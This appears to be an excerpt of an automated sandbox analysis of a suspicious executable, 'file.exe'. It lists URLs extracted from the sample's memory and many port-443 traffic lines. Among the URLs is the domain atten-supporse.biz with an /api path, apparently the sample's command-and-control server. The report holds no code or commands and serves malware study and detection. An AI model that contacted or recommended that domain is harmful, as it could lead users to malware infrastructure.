                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://aka.ms/certhelp
                Source: chromecache_131.8.dr, chromecache_132.8.dr, chromecache_95.8.drString found in binary or memory: https://aka.ms/feedback/report?space=61
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://aka.ms/msignite_docs_banner
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://aka.ms/pshelpmechoose
                Source: chromecache_131.8.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000111E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1666285292.00000000011D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541800383.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1624992046.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/JSB
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1827558227.00000000011CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/RSz
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1594686688.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                Source: file.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apibdoD
                Source: chromecache_131.8.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
                Source: chromecache_131.8.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://channel9.msdn.com/
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/Thraka
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/Youssef1313
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/adegeo
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://github.com/dotnet/try
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/gewarren
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/mairaw
                Source: chromecache_131.8.drString found in binary or memory: https://github.com/nschonni
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chromecache_131.8.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
                Source: chromecache_122.8.drString found in binary or memory: https://schema.org
                Source: file.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: file.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
                Source: chromecache_122.8.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
                Source: file.exe, 00000000.00000003.1595664437.0000000005966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: file.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: file.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: file.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: file.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49708 version: TLS 1.2
